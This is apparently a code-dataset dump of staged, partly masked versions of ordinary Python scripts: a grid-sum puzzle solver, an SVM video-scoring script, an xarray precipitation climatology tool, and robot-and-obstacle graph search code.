| code (string, 13 – 6.09M chars) | order_type (string, 2 classes) | original_example (dict) | step_ids (list, 1–5 items) |
|---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(n):
    if cl[i] == a + b:
        print(i + 1)
<|reserved_special_token_1|>
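# Read n, a, b and the n values; print the 1-based position of every value equal to a + b.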
n, a, b = map(int, input().split())
cl = list(map(int, input().split()))
for i in range(n):
    if cl[i] == a + b:
        print(i + 1)
|
flexible
|
{
"blob_id": "ff081a5ff46ab37dc5a144fb4616c06ef3bca490",
"index": 7286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n):\n if cl[i] == a + b:\n print(i + 1)\n",
"step-3": "n, a, b = map(int, input().split())\ncl = list(map(int, input().split()))\nfor i in range(n):\n if cl[i] == a + b:\n print(i + 1)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/bin/python
import numpy as np
import os
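# SVC is imported so the estimator class is in scope when the pickled model is
# loaded below (pickle also imports it on demand, so this is belt-and-braces).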
from sklearn.svm import SVC
import pickle
import sys
# Apply the SVM model to the testing videos; Output the score for each video
if __name__ == '__main__':
    if len(sys.argv) != 5:
        print("Usage: {0} model_file feat_dir file_list_path output_file".format(sys.argv[0]))
        print("model_file -- path of the trained svm file")
        print("feat_dir -- dir of feature files")
        print("file_list_path -- path of list file (val.lst or test.lst)")
        print("output_file -- path to save the prediction score")
        exit(1)

    model_file = sys.argv[1]
    feat_dir = sys.argv[2]
    file_list_path = sys.argv[3]
    output_file = sys.argv[4]

    file_list = []
    with open(file_list_path) as f:
        for line in f.readlines():
            L = line.replace('\n', ' ').split()
            file_list.append(L[0])

    smodel = pickle.load(open(model_file, "rb"))
    possible_results = ['NULL', 'P001', 'P002', 'P003']

    pred = []
    conf = []
    print('SVM_MODEL: {}'.format(model_file))
    for file in file_list:
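        # Feature file expected at feat_dir + 'bow' + <video id> + '.pkl';
        # feat_dir must therefore end with a path separator.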
        bow_file = feat_dir + 'bow' + file + '.pkl'
        if os.path.isfile(bow_file):
            with open(bow_file, 'rb') as f:
                data = pickle.load(f)
                pred.extend(smodel.predict([data]))
                conf.extend(smodel.decision_function([data]))
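        # No feature file for this video: fall back to 'NULL' with full
        # confidence assigned to the NULL class.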
        else:
            pred.extend(['NULL'])
            conf.extend([[1, 0, 0, 0]])

    print('NUM PREDICTION TO TEST: {}'.format(len(pred)))

    with open(output_file, 'w') as f:
        for i in range(0, len(file_list)):
            video = file_list[i]
            f.write(str(video) + ' ' + pred[i] + '\n')

    for i in range(1, 4):
#        tmp = np.asarray(pred)
#        template = np.zeros(np.size(tmp))
#        with open(possible_results[i] +'_val','w') as f:
#            ind = np.where(tmp == possible_results[i])
#            for j in range(0, len(ind)):
#                template[ind[j]] = 1
#            for j in range(0, len(template)):
#                f.write(str(int(template[j])) +'\n')

        print(output_file[0:-4] + '_' + possible_results[i] + '_val_label')
        with open(output_file[0:-4] + '_' + possible_results[i] + '_val_label', 'w') as f:
            for j in range(0, len(pred)):
                video = file_list[j]
                f.write(str(conf[j][i]) + ' # confidence for video ' + video + '\n')
|
normal
|
{
"blob_id": "385dccfab4d7c37d10d968658b51e231691a7b49",
"index": 1556,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print('Usage: {0} model_file feat_dir feat_dim output_file'.format(\n sys.argv[0]))\n print('model_file -- path of the trained svm file')\n print('feat_dir -- dir of feature files')\n print('file_list_path -- path of list file (val.lst or test.lst)')\n print('output_file -- path to save the prediction score')\n exit(1)\n model_file = sys.argv[1]\n feat_dir = sys.argv[2]\n file_list_path = sys.argv[3]\n output_file = sys.argv[4]\n file_list = []\n with open(file_list_path) as f:\n for line in f.readlines():\n L = line.replace('\\n', ' ').split()\n file_list.append(L[0])\n smodel = pickle.load(open(model_file, 'rb'))\n possible_results = ['NULL', 'P001', 'P002', 'P003']\n pred = []\n conf = []\n print('SVM_MODEL: {}'.format(model_file))\n for file in file_list:\n bow_file = feat_dir + 'bow' + file + '.pkl'\n if os.path.isfile(bow_file):\n with open(bow_file, 'rb') as f:\n data = pickle.load(f)\n pred.extend(smodel.predict([data]))\n conf.extend(smodel.decision_function([data]))\n else:\n pred.extend(['NULL'])\n conf.extend([[1, 0, 0, 0]])\n print('NUM PREDICTION TO TEST: {}'.format(len(pred)))\n with open(output_file, 'w') as f:\n for i in range(0, len(file_list)):\n video = file_list[i]\n f.write(str(video) + ' ' + pred[i] + '\\n')\n for i in range(1, 4):\n print(output_file[0:-4] + '_' + possible_results[i] + '_val_label')\n with open(output_file[0:-4] + '_' + possible_results[i] +\n '_val_label', 'w') as f:\n for j in range(0, len(pred)):\n video = file_list[j]\n if j < len(pred) - 1:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n else:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n",
"step-3": "import numpy as np\nimport os\nfrom sklearn.svm.classes import SVC\nimport pickle\nimport sys\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print('Usage: {0} model_file feat_dir feat_dim output_file'.format(\n sys.argv[0]))\n print('model_file -- path of the trained svm file')\n print('feat_dir -- dir of feature files')\n print('file_list_path -- path of list file (val.lst or test.lst)')\n print('output_file -- path to save the prediction score')\n exit(1)\n model_file = sys.argv[1]\n feat_dir = sys.argv[2]\n file_list_path = sys.argv[3]\n output_file = sys.argv[4]\n file_list = []\n with open(file_list_path) as f:\n for line in f.readlines():\n L = line.replace('\\n', ' ').split()\n file_list.append(L[0])\n smodel = pickle.load(open(model_file, 'rb'))\n possible_results = ['NULL', 'P001', 'P002', 'P003']\n pred = []\n conf = []\n print('SVM_MODEL: {}'.format(model_file))\n for file in file_list:\n bow_file = feat_dir + 'bow' + file + '.pkl'\n if os.path.isfile(bow_file):\n with open(bow_file, 'rb') as f:\n data = pickle.load(f)\n pred.extend(smodel.predict([data]))\n conf.extend(smodel.decision_function([data]))\n else:\n pred.extend(['NULL'])\n conf.extend([[1, 0, 0, 0]])\n print('NUM PREDICTION TO TEST: {}'.format(len(pred)))\n with open(output_file, 'w') as f:\n for i in range(0, len(file_list)):\n video = file_list[i]\n f.write(str(video) + ' ' + pred[i] + '\\n')\n for i in range(1, 4):\n print(output_file[0:-4] + '_' + possible_results[i] + '_val_label')\n with open(output_file[0:-4] + '_' + possible_results[i] +\n '_val_label', 'w') as f:\n for j in range(0, len(pred)):\n video = file_list[j]\n if j < len(pred) - 1:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n else:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n",
"step-4": "#!/bin/python \n\nimport numpy as np\nimport os\nfrom sklearn.svm.classes import SVC\nimport pickle\nimport sys\n\n# Apply the SVM model to the testing videos; Output the score for each video\n\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print(\"Usage: {0} model_file feat_dir feat_dim output_file\".format(sys.argv[0]))\n print(\"model_file -- path of the trained svm file\")\n print(\"feat_dir -- dir of feature files\")\n print(\"file_list_path -- path of list file (val.lst or test.lst)\")\n print(\"output_file -- path to save the prediction score\")\n exit(1)\n\n model_file = sys.argv[1]\n feat_dir = sys.argv[2]\n file_list_path = sys.argv[3]\n output_file = sys.argv[4]\n \n file_list = []\n with open(file_list_path) as f:\n for line in f.readlines():\n L = line.replace('\\n', ' ').split()\n file_list.append(L[0])\n \n smodel = pickle.load(open(model_file,\"rb\"))\n possible_results = ['NULL', 'P001','P002','P003'] \n \n pred = []\n conf = []\n print('SVM_MODEL: {}'.format(model_file))\n for file in file_list:\n bow_file = feat_dir + 'bow' + file + '.pkl'\n if os.path.isfile(bow_file):\n with open(bow_file,'rb') as f:\n data = pickle.load(f)\n pred.extend(smodel.predict([data]))\n conf.extend(smodel.decision_function([data]))\n else:\n pred.extend(['NULL'])\n conf.extend([[1, 0, 0, 0]])\n \n print('NUM PREDICTION TO TEST: {}'.format(len(pred)))\n\n \n with open(output_file,'w') as f:\n for i in range(0, len(file_list)):\n video = file_list[i]\n f.write(str(video) + ' ' + pred[i] + '\\n')\n \n for i in range(1,4):\n# tmp = np.asarray(pred)\n# template = np.zeros(np.size(tmp))\n# with open(possible_results[i] +'_val','w') as f:\n# ind = np.where(tmp == possible_results[i])\n# for j in range(0, len(ind)):\n# template[ind[j]] = 1\n# for j in range(0, len(template)):\n# f.write(str(int(template[j])) +'\\n')\n \n print(output_file[0:-4]+'_'+possible_results[i] +'_val_label')\n with open(output_file[0:-4]+'_'+possible_results[i] +'_val_label','w') as f:\n for j in range(0, len(pred)):\n video = file_list[j]\n if j< len(pred)-1:\n f.write(str(conf[j][i])+' # confidence for video ' + video + '\\n')\n else:\n f.write(str(conf[j][i])+' # confidence for video ' + video + '\\n')\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# import sys
# sys.stdin = open("농작물input.txt")
T = int(input())
for n in range(1, T+1):
    N = int(input())
    arr = [list(map(int, list(input()))) for _ in range(N)]
    # print(arr)
    a = N//2
    b = N//2
    result = 0
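    # Sweep a diamond-shaped window down the grid: the [a, b] column span widens
    # until the middle row, then narrows again, summing the covered cells.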
    for i in range(N):
        for j in range(a, b+1):
            result += arr[i][j]
        if i < N//2:
            a += -1
            b += 1
        else:
            a += 1
            b += -1

    print("#{0} {1}".format(n, result))
|
normal
|
{
"blob_id": "2236591b3a30f51442beb20c6c43cc9e6cd921d2",
"index": 7530,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-3": "T = int(input())\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-4": "# import sys\n# sys.stdin = open(\"농작물input.txt\")\n\nT = int(input())\n\nfor n in range(1, T+1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n # print(arr)\n a = N//2\n b = N//2\n result = 0\n for i in range(N):\n for j in range(a, b+1):\n result += arr[i][j]\n print(result)\n if i < N//2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n\n print(\"#{0} {1}\".format(n, result))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
    """
    Calculates average climatology for annual data - either Jan to Dec or accumulation period
    """
    nyear = end_year - start_year + 1
    ds = xr.open_dataset(fili)
    year = ds['time'].dt.year
    dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim='time', skipna=False)
    print(dsClm)
    filo = fili.replace('annual', 'annual.clm')
    print(f'Writing climatology to {filo}')
    dsClm.to_netcdf(filo)
    return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
    """
    Calculates average climatology for annual data - either Jan to Dec or accumulation period
    """
    nyear = end_year - start_year + 1
    ds = xr.open_dataset(fili)
    year = ds['time'].dt.year
    dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim='time', skipna=False)
    print(dsClm)
    filo = fili.replace('annual', 'annual.clm')
    print(f'Writing climatology to {filo}')
    dsClm.to_netcdf(filo)
    return


if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Calculates climatology from annual data')
    parser.add_argument('fili', type=str, help='path to annual file')
    parser.add_argument('--start_year', '-sy', type=int, default=1981, help='First year for climatology')
    parser.add_argument('--end_year', '-ey', type=int, default=2015, help='Last year for climatology')
    args = parser.parse_args()
    precip_stats_to_climatology(args.fili, start_year=args.start_year, end_year=args.end_year)
<|reserved_special_token_1|>
import xarray as xr


def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
    """
    Calculates average climatology for annual data - either Jan to Dec or accumulation period
    """
    nyear = end_year - start_year + 1
    ds = xr.open_dataset(fili)
    year = ds['time'].dt.year
    dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim='time', skipna=False)
    print(dsClm)
    filo = fili.replace('annual', 'annual.clm')
    print(f'Writing climatology to {filo}')
    dsClm.to_netcdf(filo)
    return


if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Calculates climatology from annual data')
    parser.add_argument('fili', type=str, help='path to annual file')
    parser.add_argument('--start_year', '-sy', type=int, default=1981, help='First year for climatology')
    parser.add_argument('--end_year', '-ey', type=int, default=2015, help='Last year for climatology')
    args = parser.parse_args()
    precip_stats_to_climatology(args.fili, start_year=args.start_year, end_year=args.end_year)
<|reserved_special_token_1|>
import xarray as xr

def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
    """
    Calculates average climatology for annual data - either Jan to Dec or accumulation period
    """

    nyear = end_year - start_year + 1

    ds = xr.open_dataset(fili)

    year = ds['time'].dt.year
    #dsMsk = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).count(dim='time')
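    # Average over the selected window; skipna=False keeps a grid cell missing
    # if any year in the window is missing.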
    dsClm = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).mean(dim='time', skipna=False)
    #dsClm = dsClm.where(dsMsk == nyear)

    #dsMsk.to_netcdf('era5.count.nc4')

    print(dsClm)

    filo = fili.replace('annual','annual.clm')
    print(f'Writing climatology to {filo}')
    dsClm.to_netcdf(filo)

    return

if __name__ == "__main__":

    import argparse

    parser = argparse.ArgumentParser( description='Calculates climatology from annual data' )
    parser.add_argument('fili', type=str, help='path to annual file')
    parser.add_argument('--start_year', '-sy', type=int, default=1981,
                        help='First year for climatology')
    parser.add_argument('--end_year', '-ey', type=int, default=2015,
                        help='Last year for climatology')
    args = parser.parse_args()

    precip_stats_to_climatology(args.fili, start_year=args.start_year, end_year=args.end_year)
|
flexible
|
{
"blob_id": "eb403fbb307332c18ffdcdf52589c714f0719960",
"index": 3052,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n nyear = end_year - start_year + 1\n ds = xr.open_dataset(fili)\n year = ds['time'].dt.year\n dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim\n ='time', skipna=False)\n print(dsClm)\n filo = fili.replace('annual', 'annual.clm')\n print(f'Writing climatology to {filo}')\n dsClm.to_netcdf(filo)\n return\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n nyear = end_year - start_year + 1\n ds = xr.open_dataset(fili)\n year = ds['time'].dt.year\n dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim\n ='time', skipna=False)\n print(dsClm)\n filo = fili.replace('annual', 'annual.clm')\n print(f'Writing climatology to {filo}')\n dsClm.to_netcdf(filo)\n return\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description=\n 'Calculates climatology from annual data')\n parser.add_argument('fili', type=str, help='path to annual file')\n parser.add_argument('--start_year', '-sy', default=1981, help=\n 'First year for climatology')\n parser.add_argument('--end_year', '-ey', default=2015, help=\n 'Last year for climatology')\n args = parser.parse_args()\n precip_stats_to_climatology(args.fili, start_year=args.start_year,\n end_year=args.end_year)\n",
"step-4": "import xarray as xr\n\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n nyear = end_year - start_year + 1\n ds = xr.open_dataset(fili)\n year = ds['time'].dt.year\n dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim\n ='time', skipna=False)\n print(dsClm)\n filo = fili.replace('annual', 'annual.clm')\n print(f'Writing climatology to {filo}')\n dsClm.to_netcdf(filo)\n return\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description=\n 'Calculates climatology from annual data')\n parser.add_argument('fili', type=str, help='path to annual file')\n parser.add_argument('--start_year', '-sy', default=1981, help=\n 'First year for climatology')\n parser.add_argument('--end_year', '-ey', default=2015, help=\n 'Last year for climatology')\n args = parser.parse_args()\n precip_stats_to_climatology(args.fili, start_year=args.start_year,\n end_year=args.end_year)\n",
"step-5": "import xarray as xr\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n\n nyear = end_year - start_year + 1\n \n ds = xr.open_dataset(fili)\n\n year = ds['time'].dt.year\n #dsMsk = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).count(dim='time')\n dsClm = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).mean(dim='time', skipna=False)\n #dsClm = dsClm.where(dsMsk == nyear)\n \n #dsMsk.to_netcdf('era5.count.nc4')\n\n print (dsClm)\n \n filo = fili.replace('annual','annual.clm')\n print (f'Writing climatology to {filo}') \n dsClm.to_netcdf(filo)\n\n return\n\nif __name__ == \"__main__\":\n\n import argparse\n\n parser = argparse.ArgumentParser( description='Calculates climatology from annual data' )\n parser.add_argument('fili', type=str, help='path to annual file')\n parser.add_argument('--start_year', '-sy', default=1981,\n help='First year for climatology')\n parser.add_argument('--end_year', '-ey', default=2015,\n help='Last year for climatology')\n args = parser.parse_args()\n\n precip_stats_to_climatology(args.fili, start_year=args.start_year, end_year=args.end_year)\n \n\n \n \n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def make_moves_from_path(path):
    moves = []
    p = path[:]
    for i in range(len(p) - 1):
        moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
    return moves


def find_nearest_hole(o, r, graph, start):
    visited, queue = [], [(start, [start])]
    results = []
    while queue:
        node, search_path = queue.pop(0)
        if node not in visited:
            visited.append(node)
            adjacent = graph.adj[node]
            for neighbor in adjacent:
                if neighbor in o:
                    if neighbor not in visited:
                        queue.append((neighbor, search_path + [neighbor]))
                elif neighbor != r:
                    results.append(search_path + [neighbor])
    moves = []
    for res in results:
        moves.append((res[0], res[-1], len(res) - 1, res))
    return moves


def move_robot(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if not node_from == r:
        raise RuntimeError('node_from is not robot ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    robot = node_to
    return obstacles, robot


<|reserved_special_token_0|>


def possible_robot_moves(o, r, graph):
    moves = []
    robot_node = r
    robot_neighbors = graph.adj[r]
    for neighbor in robot_neighbors:
        if is_hole(o, r, neighbor):
            moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
    return moves


def possible_obstacle_moves(o, r, graph, obstacle):
    obstacle_neighbors = graph.adj[obstacle]
    moves = []
    for neighbor in obstacle_neighbors:
        if is_hole(o, r, neighbor) and neighbor != r:
            moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
        elif neighbor != r:
            nh = find_nearest_hole(o, r, graph, neighbor)
            if len(nh) > 0:
                moves.extend(nh)
    return moves


<|reserved_special_token_0|>


def possible_moves(o, r, graph):
    moves = []
    moves.extend(possible_robot_moves(o, r, graph))
    moves.extend(possible_obstacles_moves(o, r, graph))
    return moves


<|reserved_special_token_0|>


def solve_heap(o, r, graph, t):
    round = 0
    visited = set([])
    queue = [(-1000, [], o, r)]
    while queue:
        score, moves, obstacles, robot = heap.heappop(queue)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                    return new_moves
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                heap.heappush(queue, (score, new_moves, newobstacles, newrobot))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_jumps(moves):
    res = []
    for move in moves:
        if move[2] > 1:
            move[3].reverse()
            res.extend(make_moves_from_path(move[3]))
        else:
            res.append(move)
    return res


def make_moves_from_path(path):
    moves = []
    p = path[:]
    for i in range(len(p) - 1):
        moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
    return moves


def find_nearest_hole(o, r, graph, start):
    visited, queue = [], [(start, [start])]
    results = []
    while queue:
        node, search_path = queue.pop(0)
        if node not in visited:
            visited.append(node)
            adjacent = graph.adj[node]
            for neighbor in adjacent:
                if neighbor in o:
                    if neighbor not in visited:
                        queue.append((neighbor, search_path + [neighbor]))
                elif neighbor != r:
                    results.append(search_path + [neighbor])
    moves = []
    for res in results:
        moves.append((res[0], res[-1], len(res) - 1, res))
    return moves


def move_robot(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if not node_from == r:
        raise RuntimeError('node_from is not robot ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    robot = node_to
    return obstacles, robot


def move_obstacle(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if node_from not in obstacles:
        raise RuntimeError('node_from is not obstacle ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    if node_to == robot:
        raise RuntimeError('node_to is robot' + node_to)
    obstacles.append(node_to)
    obstacles.remove(node_from)
    return obstacles, robot


<|reserved_special_token_0|>


def possible_robot_moves(o, r, graph):
    moves = []
    robot_node = r
    robot_neighbors = graph.adj[r]
    for neighbor in robot_neighbors:
        if is_hole(o, r, neighbor):
            moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
    return moves


def possible_obstacle_moves(o, r, graph, obstacle):
    obstacle_neighbors = graph.adj[obstacle]
    moves = []
    for neighbor in obstacle_neighbors:
        if is_hole(o, r, neighbor) and neighbor != r:
            moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
        elif neighbor != r:
            nh = find_nearest_hole(o, r, graph, neighbor)
            if len(nh) > 0:
                moves.extend(nh)
    return moves


<|reserved_special_token_0|>


def possible_moves(o, r, graph):
    moves = []
    moves.extend(possible_robot_moves(o, r, graph))
    moves.extend(possible_obstacles_moves(o, r, graph))
    return moves


def color(o, r, graph, node, target, start):
    if node in o and node == target:
        return 'c'
    if node in o:
        return 'r'
    if node == r:
        return 'b'
    if node == start:
        return 'y'
    if node == target:
        return 'g'
    return 'w'


<|reserved_special_token_0|>


def solve_heap(o, r, graph, t):
    round = 0
    visited = set([])
    queue = [(-1000, [], o, r)]
    while queue:
        score, moves, obstacles, robot = heap.heappop(queue)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                    return new_moves
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                heap.heappush(queue, (score, new_moves, newobstacles, newrobot))


def solve_brute_force(o, r, graph, t):
    num_of_solutions = 0
    all_solutions = []
    round = 0
    visited = set([])
    queue = [([], o, r)]
    while queue:
        moves, obstacles, robot = queue.pop(0)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    all_solutions.append(new_moves)
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                queue.append((new_moves, newobstacles, newrobot))
    print('Number of solutions: ' + str(len(all_solutions)))
    best = min(all_solutions, key=lambda x: len(x))
    return best
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_jumps(moves):
    res = []
    for move in moves:
        if move[2] > 1:
            move[3].reverse()
            res.extend(make_moves_from_path(move[3]))
        else:
            res.append(move)
    return res


def make_moves_from_path(path):
    moves = []
    p = path[:]
    for i in range(len(p) - 1):
        moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
    return moves


def find_nearest_hole(o, r, graph, start):
    visited, queue = [], [(start, [start])]
    results = []
    while queue:
        node, search_path = queue.pop(0)
        if node not in visited:
            visited.append(node)
            adjacent = graph.adj[node]
            for neighbor in adjacent:
                if neighbor in o:
                    if neighbor not in visited:
                        queue.append((neighbor, search_path + [neighbor]))
                elif neighbor != r:
                    results.append(search_path + [neighbor])
    moves = []
    for res in results:
        moves.append((res[0], res[-1], len(res) - 1, res))
    return moves


def move_robot(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if not node_from == r:
        raise RuntimeError('node_from is not robot ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    robot = node_to
    return obstacles, robot


def move_obstacle(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if node_from not in obstacles:
        raise RuntimeError('node_from is not obstacle ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    if node_to == robot:
        raise RuntimeError('node_to is robot' + node_to)
    obstacles.append(node_to)
    obstacles.remove(node_from)
    return obstacles, robot


<|reserved_special_token_0|>


def possible_robot_moves(o, r, graph):
    moves = []
    robot_node = r
    robot_neighbors = graph.adj[r]
    for neighbor in robot_neighbors:
        if is_hole(o, r, neighbor):
            moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
    return moves


def possible_obstacle_moves(o, r, graph, obstacle):
    obstacle_neighbors = graph.adj[obstacle]
    moves = []
    for neighbor in obstacle_neighbors:
        if is_hole(o, r, neighbor) and neighbor != r:
            moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
        elif neighbor != r:
            nh = find_nearest_hole(o, r, graph, neighbor)
            if len(nh) > 0:
                moves.extend(nh)
    return moves


<|reserved_special_token_0|>


def possible_moves(o, r, graph):
    moves = []
    moves.extend(possible_robot_moves(o, r, graph))
    moves.extend(possible_obstacles_moves(o, r, graph))
    return moves


def color(o, r, graph, node, target, start):
    if node in o and node == target:
        return 'c'
    if node in o:
        return 'r'
    if node == r:
        return 'b'
    if node == start:
        return 'y'
    if node == target:
        return 'g'
    return 'w'


<|reserved_special_token_0|>


def fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):
    shortest = nx.shortest_path(graph, robot, target)
    score = -len(shortest) - num_of_moves
    for obstacle in obstacles:
        if obstacle in shortest:
            score = score - 1
    return -score


def solve_heap(o, r, graph, t):
    round = 0
    visited = set([])
    queue = [(-1000, [], o, r)]
    while queue:
        score, moves, obstacles, robot = heap.heappop(queue)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                    return new_moves
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                heap.heappush(queue, (score, new_moves, newobstacles, newrobot))


def solve_brute_force(o, r, graph, t):
    num_of_solutions = 0
    all_solutions = []
    round = 0
    visited = set([])
    queue = [([], o, r)]
    while queue:
        moves, obstacles, robot = queue.pop(0)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    all_solutions.append(new_moves)
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                queue.append((new_moves, newobstacles, newrobot))
    print('Number of solutions: ' + str(len(all_solutions)))
    best = min(all_solutions, key=lambda x: len(x))
    return best
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_jumps(moves):
    res = []
    for move in moves:
        if move[2] > 1:
            move[3].reverse()
            res.extend(make_moves_from_path(move[3]))
        else:
            res.append(move)
    return res


def make_moves_from_path(path):
    moves = []
    p = path[:]
    for i in range(len(p) - 1):
        moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
    return moves


def find_nearest_hole(o, r, graph, start):
    visited, queue = [], [(start, [start])]
    results = []
    while queue:
        node, search_path = queue.pop(0)
        if node not in visited:
            visited.append(node)
            adjacent = graph.adj[node]
            for neighbor in adjacent:
                if neighbor in o:
                    if neighbor not in visited:
                        queue.append((neighbor, search_path + [neighbor]))
                elif neighbor != r:
                    results.append(search_path + [neighbor])
    moves = []
    for res in results:
